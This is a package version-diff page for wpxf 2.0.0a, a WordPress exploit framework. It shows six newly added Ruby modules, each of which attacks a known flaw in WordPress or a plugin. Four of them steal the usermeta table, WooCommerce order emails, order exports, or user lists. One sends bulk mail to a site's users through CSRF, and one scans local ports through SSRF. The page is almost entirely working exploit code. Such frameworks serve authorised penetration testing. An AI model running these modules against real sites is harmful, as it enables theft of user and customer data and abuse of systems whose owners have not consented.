RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb ADDED

@@ -0,0 +1,96 @@
+# frozen_string_literal: true
+require 'wpxf/helpers/export'
+class Wpxf::Auxiliary::UserMetaManagerInformationDisclosure < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'User Meta Manager <= 3.4.6 Information Disclosure',
+      desc: %(
+        The User Meta Manager plugin up to and including v3.4.6,
+        suffers from an information disclosure vulnerability.
+        Any registered user can perform a series of AJAX requests,
+        in order to get all the contents of the `usermeta` table.
+      ),
+      author: [
+        'Panagiotis Vagenas', # Disclosure
+        'rastating'           # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8384'],
+        ['URL', 'http://seclists.org/bugtraq/2016/Feb/48']
+      ],
+      date: 'Feb 01 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The WordPress username to authenticate with',
+        required: true
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The WordPress password to authenticate with',
+        required: true
+      )
+    ])
+  end
+  def username
+    datastore['username']
+  end
+  def password
+    datastore['password']
+  end
+  def check
+    check_plugin_version_from_readme('user-meta-manager', '3.4.7')
+  end
+  def backup_table(cookie)
+    execute_get_request(
+      url: wordpress_url_admin_ajax,
+      cookie: cookie,
+      params: {
+        'action' => 'umm_switch_action',
+        'umm_sub_action' => 'umm_backup'
+      }
+    )
+  end
+  def download_backup(cookie)
+    execute_get_request(
+      url: wordpress_url_admin_ajax,
+      cookie: cookie,
+      params: {
+        'action' => 'umm_switch_action',
+        'umm_sub_action' => 'umm_get_csv'
+      }
+    )
+  end
+  def run
+    return false unless super
+    cookie = authenticate_with_wordpress(username, password)
+    return false unless cookie
+    emit_info 'Creating table backup...'
+    backup_table(cookie)
+    emit_info 'Downloading table backup...'
+    res = download_backup(cookie)
+    loot = export_and_log_loot res.body, 'Backup of the usermeta table', 'backup', '.csv'
+    emit_success "Downloaded backup to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/woocommerce_email_test_order_disclosure.rb ADDED

@@ -0,0 +1,53 @@
+# frozen_string_literal: true
+require 'wpxf/helpers/export'
+class Wpxf::Auxiliary::WoocommerceEmailTestOrderDisclosure < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'WooCommerce Email Test <= 1.5 Order Information Disclosure',
+      desc: %(
+        Versions <= 1.5 of the WooCommerce Email Test plugin allow unauthenticated
+        users to download a copy of the last order confirmation e-mail sent by the system.
+      ),
+      author: [
+        'jansass GmbH', # Disclosure
+        'rastating'     # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8689']
+      ],
+      date: 'Dec 08 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('woocommerce-email-test', '1.6')
+  end
+  def run
+    return false unless super
+    emit_info 'Downloading order confirmation export...'
+    res = execute_get_request(
+      url: full_uri,
+      params: {
+        'woocommerce_email_test' => 'WC_Email_Customer_Completed_Order'
+      }
+    )
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+    loot = export_and_log_loot res.body, "The last WooCommerce order confirmation as of #{Time.now}", 'email', '.html'
+    emit_success "Saved HTML e-mail to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/woocommerce_order_import_export_order_disclosure.rb ADDED

@@ -0,0 +1,60 @@
+# frozen_string_literal: true
+require 'wpxf/helpers/export'
+class Wpxf::Auxiliary::WoocommerceOrderImportExportOrderDisclosure < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'Order Import Export for WooCommerce <= 1.0.8 Order Information Disclosure',
+      desc: %(
+        Version <= 1.0.8 of the import export plugin for WooCommerce allows unauthenticated
+        users to download a CSV disclosing information about orders placed in the system.
+      ),
+      author: [
+        'David Peltier', # Disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8624'],
+        ['EDB', '40391']
+      ],
+      date: 'Sep 19 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('order-import-export-for-woocommerce', '1.0.9')
+  end
+  def export_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+  def run
+    return false unless super
+    emit_info 'Downloading order export CSV...'
+    res = execute_get_request(
+      url: export_url,
+      params: {
+        'page' => 'wf_woocommerce_order_im_ex',
+        'action' => 'export'
+      }
+    )
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+    loot = export_and_log_loot res.body, 'Export of WooCommerce orders', 'export', '.csv'
+    emit_success "Saved export to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb ADDED

@@ -0,0 +1,86 @@
+# frozen_string_literal: true
+require 'wpxf/helpers/export'
+class Wpxf::Auxiliary::Wp47UserInfoDisclosure < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'WordPress 4.7 - User Information Disclosure via REST API',
+      desc: %(
+        The new WordPress REST API allows anonymous access. One of the functions that
+        it provides, is that anyone can list the users on a WordPress website without
+        registering or having an account.
+      ),
+      author: [
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8715'],
+        ['URL', 'https://github.com/WordPress/WordPress/commit/daf358983cc1ce0c77bf6d2de2ebbb43df2add60']
+      ],
+      date: 'Jan 11 2017'
+    )
+  end
+  def check
+    version = wordpress_version
+    return :unknown if version.nil?
+    return :vulnerable if version == Gem::Version.new('4.7')
+    :safe
+  end
+  def users_api_url
+    normalize_uri(full_uri, 'wp-json', 'wp', 'v2', 'users')
+  end
+  def call_users_api
+    res = execute_get_request(url: users_api_url)
+    if res.nil?
+      emit_error 'No response from the target'
+      return nil
+    end
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return nil
+    end
+    res
+  end
+  def output_user_list(api_output)
+    headers = [{ id: 'ID', username: 'Username', name: 'Name' }]
+    rows = []
+    users = JSON.parse(api_output)
+    users.each do |user|
+      store_credentials user['slug']
+      rows.push(id: user['id'], username: user['slug'], name: user['name'])
+    end
+    rows.sort_by! { |row| row[:id] }
+    emit_table headers.concat(rows)
+  end
+  def run
+    return false unless super
+    emit_info 'Calling the users API...'
+    res = call_users_api
+    return false if res.nil?
+    emit_info 'Parsing result...', true
+    output_user_list res.body
+    loot = export_and_log_loot res.body, 'List of usernames from the REST API', 'user list', '.json'
+    emit_success "Saved export to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb ADDED

@@ -0,0 +1,89 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::EmailUsersCsrfBulkMail < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Email Users <= 4.8.3 CSRF Bulk Mail',
+      desc: 'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\
+            'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
+            'all users of a specified role.',
+      author: [
+        'Julien Rentrop', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8601'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The role of the users to send the e-mail to',
+        default: 'Subscriber',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_body',
+        desc: 'The HTML body of the e-mail to send',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_subject',
+        desc: 'The subject of the e-mail to send',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('email-users', '4.8.4')
+  end
+  def user_role
+    "role-#{datastore['user_role'].downcase}"
+  end
+  def on_http_request(path, _params, _headers)
+    return '' unless path.eql? normalize_uri(xss_path, initial_req_path)
+    emit_info 'Serving CSRF script to victim...'
+    stop_http_server
+    { type: 'text/html', body: initial_script }
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=mailusers-send-to-group-page')
+  end
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'send' => 'true',
+      'fromName' => '',
+      'fromAddress' => '',
+      'group_mode' => 'role',
+      'mail_format' => 'html',
+      'send_targets[]' => user_role,
+      'subject' => datastore['email_subject'],
+      'mailcontent' => datastore['email_body']
+    )
+  end
+  def run
+    return false unless super
+    emit_info 'Provide the URL below to the victim to send the bulk e-mail'
+    puts
+    puts url_with_xss
+    puts
+    start_http_server
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb ADDED

@@ -0,0 +1,66 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::QardsLocalPortScan < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'Qards Local Port Scan',
+      desc: %(
+        This module exploits a server side request forgery vulnerability, which
+        enables a remote user to check if a service is running on a local port.
+      ),
+      author: [
+        'theMiddle', # Disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8933']
+      ],
+      date: 'Oct 11 2017'
+    )
+    register_options([
+      PortOption.new(
+        name: 'lport',
+        desc: 'The port number to scan',
+        required: true,
+        default: 22
+      )
+    ])
+  end
+  def check
+    res = execute_get_request(url: scan_url)
+    res&.code == 200 ? :vulnerable : :safe
+  end
+  def scan_url
+    normalize_uri(wordpress_url_plugins, 'qards', 'html2canvasproxy.php')
+  end
+  def lport
+    normalized_option_value('lport')
+  end
+  def run
+    return false unless super
+    res = execute_get_request(url: scan_url, params: { 'url' => "http://127.0.0.1:#{lport}" })
+    unless res&.code == 200
+      emit_error 'Response code was not 200', true
+      return false
+    end
+    if res.body.match?(/SOCKET: Connection refused/)
+      emit_warning "Port #{lport} is closed"
+    else
+      emit_success "Port #{lport} is open"
+    end
+    true
+  end
+end